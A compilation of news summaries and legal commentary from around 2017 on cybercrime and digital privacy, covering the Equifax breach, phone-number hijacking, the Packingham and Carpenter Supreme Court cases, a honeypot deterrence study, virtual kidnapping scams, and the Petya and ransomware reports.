Richard Smith, 57, had led the firm since 2005 and was widely admired on Wall Street. He had been under the spotlight since news broke of an Equifax data breach that exposed the personal information of as many as 143 million people.
The chairman and chief executive of Equifax, Richard F. Smith, retired on Tuesday in the aftermath of a major data breach that exposed the personal information of as many as 143 million people, says the New York Times. Two other top Equifax executives — the chief information officer and the chief security officer — stepped down on Sept. 14. Equifax, based in Atlanta, said this month that hackers had exploited an unpatched flaw in its website software to extract names, Social Security numbers, birth dates, addresses and other information about millions of people. The company faced a blistering outcry from lawmakers and the public for failing to protect the sensitive data and for a response that many found lackluster.
Smith, 57, had been the chairman and chief executive of Equifax Inc. since 2005. He joined the company after a 22-year career at General Electric that included top executive positions in the conglomerate’s insurance, leasing and asset-management divisions. Before the data breach at Equifax, Smith was widely admired on Wall Street for developing new products and increasing sales. Equifax had revenue of $3.1 billion last year, up from $1.4 billion the year he took over. Federal authorities, led by the F.B.I., have opened a criminal investigation into the cyberattack on Equifax. More than 30 state attorneys general have begun investigations into the breach, and federal lawmakers from both parties have requested information from Equifax and called for hearings on what went wrong.
Atlanta-based credit reporting agency said hackers exploited a “website application vulnerability” and got sensitive personal data including Social Security numbers, birth dates, and home addresses.
The credit reporting agency Equifax said hackers gained access to sensitive personal data — Social Security numbers, birth dates and home addresses — for up to 143 million people. The Washington Post calls it a major cybersecurity breach at a firm that serves as one of the three major clearinghouses for Americans’ credit histories. Equifax said the breach began in May and continued until it was discovered in late July. It said hackers exploited a “website application vulnerability” and obtained personal data about British and Canadian consumers as well as Americans. Social Security numbers and birth dates give those who possess them the ingredients for identity fraud and other crimes.
Equifax also lost control of an unspecified number of driver’s licenses, along with the credit card numbers for 209,000 consumers and credit dispute documents for 182,000 others. The company said it did not detect intrusions into its “core consumer or commercial credit reporting databases.” “The type of information that has been exposed is really sensitive,” said Beth Givens of the Privacy Rights Clearinghouse, a consumer advocacy group based in San Diego. “All in all, this has the potential to be a very harmful breach to those who are affected by it.” Equifax, based in Atlanta, is working with law enforcement on an investigation of the breach and has hired an independent cybersecurity research firm to assess the scope of the intrusion.
Hackers are finding a lucrative market in stealing mobile phone numbers and resetting passwords on every account that uses the number as a security backup. the Federal Trade Commission had reports of 2,658 incidents as of January 2016.
Hackers have discovered that mobile phone numbers are easy to steal. In a growing number of online attacks, hackers have been calling up Verizon, T-Mobile U.S., Sprint and AT&T and asking them to transfer control of a victim’s phone number to a device under the control of the hackers, the New York Times reports. Once they get control of the phone number, they can reset the passwords on every account that uses the phone number as a security backup, as services like Google, Twitter and Facebook suggest. A wide array of people have complained about being successfully targeted, including a Black Lives Matter activist and the chief technologist of the Federal Trade Commission. The commission’s own data shows that the number of so-called phone hijackings has been rising. In January 2013, there were 1,038 such incidents reported; by January 2016, that number had increased to 2,658.
One user of virtual currency said hackers changed the password on his virtual currency wallet and drained about $150,000. “Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur. The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. The attacks are exposing a vulnerability that could be exploited against almost anyone with valuable emails or other digital files. Last year, hackers took over the Twitter account of Black Lives Matter leader DeRay Mckesson by first getting his phone number. In cases involving digital money aficionados, the attackers have held email files for ransom — threatening to release naked pictures in one case, and details of a victim’s sexual fetishes in another.
A Supreme Court ruling in June overruled the conviction of a sex offender for violating his probation after posting on Facebook. But that opens up a new legal minefield over limitations on internet access for anyone convicted of a crime, warns a Washington, DC attorney.
Court-imposed web restrictions applied to criminal defendants may be going the way of dial-up internet service.
In June, the Supreme Court issued a unanimous ruling in Packingham v. North Carolina that invalidated a state law banning registered sex offenders from accessing websites that could facilitate direct communications with minors.
While the majority opinion and concurrence seems grounded in—and specific to—sex offender restrictions, the evolving communications technology that operates in cyberspace today suggests that the ruling will have an impact on attempts to restrict web access for all criminal defendants in state or federal courts.
Lester Packingham pleaded guilty to having sex with a 13-year-old girl when he was 21. Eight years after his conviction, Lester bragged on Facebook about a happy day in traffic court, using the screen name of J.R. Gerrard, and exclaiming:
“Man God is Good! How about I got so much favor they dismissed the ticket before court even started? No fine, no court cost, no nothing spent…Praise be to GOD, WOW! Thanks JESUS!”
A police officer tracked down court records, obtained a search warrant, and correctly identified “J.R.” as an alias for Lester Packingham.
He was subsequently convicted of violating a North Carolina statute that prohibits convicted sex offenders from using social-networking websites, such as Facebook and Twitter. The unanimous Supreme Court opinion, written by Justice Anthony Kennedy, reversed the conviction on First Amendment free speech grounds.
According to Kennedy, the North Carolina statute was too broad, in that it effectively prevented sex offenders from accessing the “vast democratic forums of the Internet” that serve as principal sources of information on employment opportunities, current events, and opinions or ideas that have no connection to criminal plans or the potential victimization of children.
Justice Samuel Alito agreed, pointing out that the statute’s definition of social networking sites would in effect encompass even Amazon, the Washington Post, and WebMD—all of whom provide opportunities for visitors to connect with other users. In his concurrence, he noted that states were entitled to draft narrower, and constitutionally valid, restrictions because of their legitimate interest in thwarting recidivist sex offenders.
But it’s not at all clear that a state legislature can follow Justice Alito’s guidance and sufficiently narrow its sights on offender/child communication to the point where the law has its intended effect, while still passing constitutional muster.
There may undoubtedly be pedophiliac versions of Tinder or Match.com which could fit the definitions of sites where access can be restricted without harm to First Amendment protections. But today’s internet does not lend itself easily to such narrow definitions. Even mainstream sites like The Washington Post or Amazon could be considered portals that might be compromised by criminal behavior. Such sites encourage the kind of user engagement that, while they may not be fairly called a “chat room,” is close enough to a “bulletin board” to bring us right back into the perils of North Carolina’s now-invalidated law.
And what of the defendants facing internet restrictions for reasons other than molestation or child pornography violations?
There are numerous defendants who are bounced off the internet as a condition of probation or supervised release because the internet was an instrumentality for their crimes. For instance, internet-based fraud, identity theft, or using pro-terrorism websites to construct weapons or murderous plans, are all offenses that have led judges to impose some form of web restriction on defendants.
Web restrictions for these defendants are now also in play in a post-Packingham world.
The intention of the judges seeking to restrict web access in these cases is understandable. They want to remove potential tools of victimization from the hands of convicted criminals. But the Supreme Court’s recognition of the vast, evolving and multi-purpose nature of today’s internet has brought legitimate First Amendment considerations into almost every web-limiting decision.
We may soon see that the only web restrictions that are lawful and practically enforceable are ones stemming from the defendant volunteering to withdraw from the net—likely because of the perceived trade-off between more time in jail and the judge’s comfort level as to assurances that re-victimization by internet will not occur when the defendant is returned to the community.
In the meantime, Packingham may shape the battlefield when web-restricted defendants are alleged to have violated parole or probation by visiting websites. Judges facing considerably more ominous violations than Lester’s on-line celebration of beating a traffic ticket may find that website-messaging technology and powerful First Amendment concerns leave them with little recourse but to ban outright all attempts to restrict access.
To some, this may be an uncomfortably high price to pay for web freedom.
On a practical level, technology has largely out-paced the now-antiquated view that the Internet can be surgically sliced into “safe” websites and “unsafe” ones, and the unanimity of Packingham suggests that the Court did not struggle much with its rationale.
While the absence of web-restrictions would lead to the release of offenders to the community with an unavoidable dose of discomfort with their access to computers, it may also result in judges finding themselves increasingly satisfied with lengthy prison terms because of the lack of a satisfactory, less-restrictive condition of supervised release.
So, somewhat ironically, the next Lester Packingham may find himself spending more time in prison because of his inability to convince a judge that self-restraint on the computer can adequately replace judicially-imposed restraints.
Perhaps the safer bet here is on technology – that some program, some application, or some web-alternative pops up in the future and revitalizes the possibility of judges restricting web access without violating First Amendment rights.
James Trusty is a Member at Ifrah Law, PLLC, where he leads the White Collar Practice Group. He was formerly Chief of the Department of Justice Organized Crime & Gang Section, and has spent 27 years serving as either a local or federal prosecutor. He also teaches criminal Justice courses at University of Maryland (Shady Grove). He welcomes comments from readers.
A case before the Supreme Court next month could decide whether constitutional protections against warrantless searches prevent courts and law enforcement from using evidence discovered from cellphone records, says a former NYC prosecutor.
Most people know that very little they do on the web is private. The terabytes of data held online contain personal information accessible not only to friends, relatives and would-be employers, but to private businesses, which frequently collect user information in order to deliver better services to customers.
Can the government see it too?
In 1979, the Supreme Court ruled in Smith v. Maryland that Fourth Amendment protections against warrantless searches do not cover such “third party” access to online data. In what has since been developed as the “Third Party Doctrine,” the court ruled that an individual has no legitimate expectation of privacy for information voluntarily given to a third party—be it a person, bank, or phone carrier—information that is also then similarly available to government agencies.
But what are government agencies, such as law enforcement, constitutionally permitted to do with the data they collect? A case before the Court next month may help answer the question.
Carpenter v. United States has the potential to affect application of the Fourth Amendment’s Third Party Doctrine in the digital age.
The case involves a string of robberies, allegedly organized by the defendant, Timothy Carpenter, which occurred over a two-year period. Police acquired cell site location information (CSLI) associated with the phone he used. Although no search warrant was ever obtained, a judge did sign a court order under the Stored Communications Act, a statute that requires reasonable suspicion, not probable cause.
The CSLI records revealed Carpenter’s location and movements over 127 days and showed that during the five-month period his phone was in communication with cell towers near the crime scenes.
Although there is a tendency to read Smith v. Maryland as a blanket rule, where anything given to or accessed by a third party has no Fourth Amendment interest, it doesn’t make sense to apply a doctrine created over 30 years ago to types of communications and data that were neither used at the time nor contemplated by the Court.
“Given how much [of] our data goes through third parties, if you take a strong reading of the Doctrine, it essentially wipes out Fourth Amendment protections for most modern communications,” Michael Price, Senior Counsel for the Liberty and National Security Program at New York University’s Brennan Center for Justice, told me.
“There is also nothing about location information in Smith. To rely on it, and say that location information should be accessible without a warrant, is reading the case far too broadly.”
Price’s point is an important one.
To analogize cases is to suggest they should be treated the same under the law and receive the same level of protection. Although the facts may specifically involve cell-site information, Carpenter is about more than just location privacy. Here, as is increasingly the case with Internet-of-Things-based prosecutions, a third-party server already had access to the sought after location data.
Carpenter presents the first chance for the Court to reconsider Fourth Amendment protections against warrantless searches and seizures of information generated and collected by the many modern technologies we use every day.
This is an opportunity at least one Supreme Court Justice has recognized.
In 2012, the Court resolved the issue of location privacy in United States v. Jones, holding that installation of a Global Positioning System (GPS) tracking device on a vehicle and using it to monitor the vehicle’s movements constitutes a search under the Fourth Amendment. In her concurrence, Justice Sonia Sotomayor wrote that the current approach to these cases is “ill-suited to the digital age, in which people reveal a great deal of information about themselves to third parties in the course of carrying out mundane tasks”
She suggested it may need to be rethought in the future.
There are signs from recent cases, like Jones, that the Justices are aware of the importance of technology in contemporary life. They appear to recognize that technology is significantly different today than it was ten years ago, let alone when the Court was deciding cases like Smith.
Riley v. California was the first time the Supreme Court identified the central role that cellphones have in today’s society, holding that police need a warrant to search a smart phone belonging to a person who has been arrested. Writing for the majority in 2014, Chief Justice John Roberts said that cell phones have “such a pervasive and insistent part of daily life that the proverbial visitor from Mars might conclude they were an important feature of human anatomy.”
The Riley Court went on to say that cellular phones have become essential to freedom of speech and First Amendment rights and, due to the volume and personal nature of the information that can be stored on a cellphone, the data should be presumptively protected by the First Amendment. The decision notes that a cell phone can double as a diary, camera, calendar, or newspaper, which makes the search of one fundamentally different from a physical search or even a search of business records.
“This is an important decision, in terms of First Amendment protections, showcasing the Supreme Court’s comfort with new technology and that it is cognizant of the impact of digital information,” said Andrew Ferguson of the David A. Clarke School of Law at the University of District Columbia, and a national expert on predictive policing and the Fourth Amendment,
Similarly, earlier this year, the Court decided Packingham v. North Carolina, which addressed the prevalence and necessity of the internet and social media in a digitized society.
Riley embodies the idea that new technologies and the digital space are different, yet fails to view these devices for what they are rather than what they’re most similar to. A cell phone is not a diary, calendar or any of the technologies cited by by the Court, and to draw a series of slightly-off-the-mark analogies and suggesting they should be treated the same, is not a solution.
In reviewing Carpenter, there are only a few scenarios for the Court—each of which will have lasting implications.
The Court might opt to temporarily put tape over the problem, hiding behind the Third Party Doctrine and wait for the next case to make its way up.
Or it could limit the Doctrine’s application to CSLI and recognize that carrying a cellular phone does not, in and of itself, amount to consenting to location tracking.
“One of the difficulties the Court is confronted with is that the Doctrine, as it’s been created, doesn’t offer a nice neat answer,” said Ferguson. “The Court may have to rethink their traditional approach to the Fourth Amendment in order to address this new technological threat to privacy and security.
“The other difficulty is: If Carpenter is really about the future of the Third Party Doctrine, it is about far more than just cell site records—it is about the future of a data-driven third party mediated age.”
That is a huge question to answer. And, due to the far-reaching consequences any of the scenarios the Court may chose, the Court may also just decide to punt it to a future case.
There are few things we do online that aren’t connected, in some way, to a third party. As smartphone technology continues to advance, more and more aspects of our lives will be recorded and stored on third-party servers. Lower courts across the country are only just beginning to consider how the Internet of Things will affect our expectations of privacy.
Carpenter is an opportunity for the Supreme Court to reconceive how privacy and security values can be protected in an era of increasingly sophisticated surveillance technologies that allow us to remotely control the lights and heat in our homes or monitor intruders.
Let’s hope the Justices take it.
Deanna Paul (@thedeannapaul) is a former New York City prosecutor and adjunct professor of trial advocacy at Fordham University School of Law. This fall she will begin attending Columbia University’s graduate school of journalism. Her nonfiction work has been published by The Marshall Project, Rolling Stone, and WIRED.
University of Maryland-College Park researchers set up over 200 “honeypot” computers to test whether online warnings deter cyberthieves. Quite the opposite, they found—in a study that may be a wakeup call to law enforcement.
Warnings aimed at discouraging cyberhackers have almost no effect on skilled cybercriminals, according to a University of Maryland-College Park study.
In a finding that is likely to prove discouraging to law enforcement, the study discovered that warning “banners” set to flash across screens to discourage illegal online activity actually prodded trespassers to increase their efforts to infiltrate computer networks.
Researchers set up a number of “honeypot” computer accounts at a large American university, which was not named, to lure and monitor hackers to test whether “situational deterring cues” discourage system trespassing —”one of the fastest growing, yet least understood, forms of cybercriminal activity,” according to the study, released Wednesday by Criminology & Public Policy, published by the American Society of Criminology.
The University of Maryland researchers set up a number of decoy computer accounts and during a six-month period in 2012 waited for the trespassers to arrive. And they certainly did.
The study authors—Alexander Testa, David Maimon, Bertrand Sobesto, and Michel Cukier─ reported 553 unique “system trespassing events” on the 221 target computers.
Once the hackers had broken into the honeypot computers their screens flashed with an online warning banner:
The actual or attempted unauthorized access, use, or modification of this system is strictly prohibited. Unauthorized users are subject to institutional disciplinary proceedings and/or criminal and civil penalties under state, federal, or other applicable domestic and foreign laws. The use of this system is monitored and recorded for administrative and security reasons. Anyone accessing this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, the Institution may provide the evidence of such activity to law enforcement officials.
The researchers then observed and recorded the hackers’ behavior: How they navigated the attacked computer system, or changed file permissions, even after they were exposed to no-trespass warnings.
Those who had broken through the barriers to access administrator accounts—the privileged accounts that provide widespread access and the ability to wreak the maximum damage, usually held by information technology staff—didn’t appear dissuaded by the warning.
In fact, according to the researchers, hackers “increased the proportion of system trespassing events in which the ‘change file permission’ command was recorded,” compared to a control group that did not see a warning.
In a finding that they said surprised them, “sanction threats in an attacked computer system escalated the manipulation of file permission.”
In other words, the warning only apparently goaded them to keep hacking.
Some 21 percent of the hackers ferreted out by the decoy computers appear to be relative amateurs who did not attempt to crack administrative accounts, and in this group, there were signs of users being intimidated or deterred by the online warnings.
The study authors concluded that the more skilled hackers possessed “high criminal self-efficacy” and were confident in their ability to escape detection. Another possibility is that the sight of the warning banner made them react “defiantly.”
When faced with a threat, “administrative trespassers may escalate their offending in response to a sanction threat perceived as illegitimate,” the study said.
The lesson for security services, say the authors, is that more stringent methods are needed to deter the kinds of cybercriminality that have resulted in the theft of thousands of individuals’ identities, credit card numbers and other private information from large corporate networks over the past several years.
While they did not rule out the use of online warnings as a deterrent, the authors recommended the development of more sophisticated strategies that employed “repeated visual and verbal cues that can be responsive to a diverse group of offenders and situations in cyberspace.”
The full study, entitled “Illegal Roaming and File Manipulation on Target Computers” is available online here.
This summary was prepared by TCR Deputy Editor (Digital) Nancy Bilyeau. Readers’ comments are welcome.
In a growing menace, scammers try to extort money after phoning parents or other kin and falsely convincing them that a loved one is being held hostage. They sometimes research potential victims on social media.
Hundreds of people in Southern California have been targeted by criminals hoping to carry out a scheme that law enforcement officials have termed “virtual kidnapping for ransom,” reports the Los Angeles Times. The scammers try to extort money after phoning parents or other kin and falsely convincing them that a loved one is being held hostage. A network of criminals in the U.S. and Mexico have been making the calls since at least 2015, affecting thousands of people in several states, including California, according to Gene Kowel of the FBI in Los Angeles. Officials from the FBI, LAPD and other agencies held a press conference Tuesday to warn potential victims against succumbing to panic if they receive a similar call.
Investigators made their first arrest in connection with the scam last week. Yanette Rodriguez Acosta, 34, of Houston was indicted on charges of wire fraud and conspiracy to commit money laundering. She is charged as part of a ring that used Mexican telephone numbers to call targets in Los Angeles and Beverly Hills, claiming to hold the victims’ children as prisoners. The ring targeted at least 39 victims in California, Texas and Idaho. At least 250 calls were aimed at Los Angeles residents, costing victims roughly $114,000. Officials said some scammers research potential victims on social media.
The Trump administration’s refusal to publicly accuse Russia and others in a wave of politically motivated hacking attacks is creating a policy vacuum that security experts fear will encourage more cyber warfare. The White House “just wants ‘cyber’ to go away,” said one expert.
The Trump administration’s refusal to publicly accuse Russia and others in a wave of politically motivated hacking attacks is creating a policy vacuum that security experts fear will encourage more cyber warfare, reports Reuters. In the past three months, hackers broke into official websites in Qatar, helping to create a regional crisis; suspected North Korean-backed hackers closed down British hospitals with ransomware; and a cyber attack that researchers attribute to Russia deleted data on thousands of computers in the Ukraine. Yet neither the United States nor the 29-member NATO military alliance have publicly blamed national governments for those attacks.
President Trump has refused to accept conclusions of U.S. intelligence agencies that Russia interfered in the 2016 U.S. elections using cyber warfare methods to help win. “The White House is currently embroiled in a cyber crisis of existential proportion, and for the moment probably just wants ‘cyber’ to go away, at least as it relates to politics,” said Kenneth Geers, a security researcher with NATO. “This will have unfortunate side effects for international cyber security.” With no one calling out known perpetrators, more hacking attacks are inevitable, experts say.
Ukraine’s prime minister called yesterday’s cyberattack — which targeted government workstations, power companies, banks, state-run TV stations, airports and ATMs — “unprecedented” in scope. The so-called Petya attack reboots victims’ computers, encrypts their hard drive’s master file and renders their entire hard drive inoperable. The ransom request, $300 in bitcoin, “doesn’t seem consistent with state-sponsored attackers,” says one expert.
Get used to the kind of ransomware attack that crippled critical infrastructure and shut down major corporations yesterday. It was an escalation of the kind of cyber attack that’s becoming a regular occurrence worldwide with a reach that’s threatening key elements of national security, reports Axios.com.These kinds of attacks are affecting more people as they spill out of the cyber realm and affect hospitals, power grids, and multi-national corporations. At the same time, consumer anxiety about security is at an all-time high, according to the Unisys Security Index and EY’s Global Capital Confidence Barometer, which shows cybersecurity concerns are delaying business deals.
Ukraine’s prime minister, Volodymyr Groysman, called yesterday’s cyberattack — which targeted government workstations, power companies, banks, state-run TV stations, airports and ATMs — “unprecedented” in scope. The so-called Petya attack reboots victims’ computers, encrypts their hard drive’s master file and renders their entire hard drive inoperable. The ransom requested for access to an infected computer is $300 in bitcoin, and “doesn’t seem consistent with state-sponsored attackers,” said Bret Padres, a former intel official and CEO of The Crypsis Group. The attack came just over a month after the massive WannaCry ransomware attack, conducted by a North Korean hacking group, spread to 300,000 breaches across 150 countries.Padres says “Eastern European systems are more likely to be running unpatched and could be more vulnerable to this type of attack,” but the “bulk of the U.S. capability in cyber security is in its offensive operations. We are in a very vulnerable place when it comes to defenses.”
Security experts say ransomware attacks are an Internet scourge, but a new FBI reports suggests that the vast majority of its victims simply don’t bother reporting incidents of this growing financial cyber-menace.
Despite its expanding threat, ransomware infections are rarely reported to law enforcement agencies, according to the FBI’s latest Internet Crime Report. Bleeping Computer reports that the FBI’s Internet Crime Complaint Center (IC3) received just 2,673 complaints about ransomware attacks in 2016. Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. Victims who did report to the FBI said the attacks resulted in just $2.4 million in damages in 2016. But the numbers do not reflect what’s happening in the real world, where ransomware is one of today’s most prevalent cyber-threats, according to multiple reports from cyber-security companies.
Experts suggest that people and companies are paying ransoms, restoring files from backups, or reinstalling PCs without filing a complaint with authorities. Last year, the FBI reported that ransomware incidents had doubled from 2014 to 2015. In 2016, the number of ransomware complaints remained the same, despite cyber-security companies reporting an increase in activity. For example, an IBM report said email spam spreading ransomware spiked 6,000 percent in 2016, while a PhishMe report said spam delivering ransomware accounted for 37 percent of all email spam. A Carbon Black report said ransomware operators were on track to make nearly $850 million from ransom payments this year.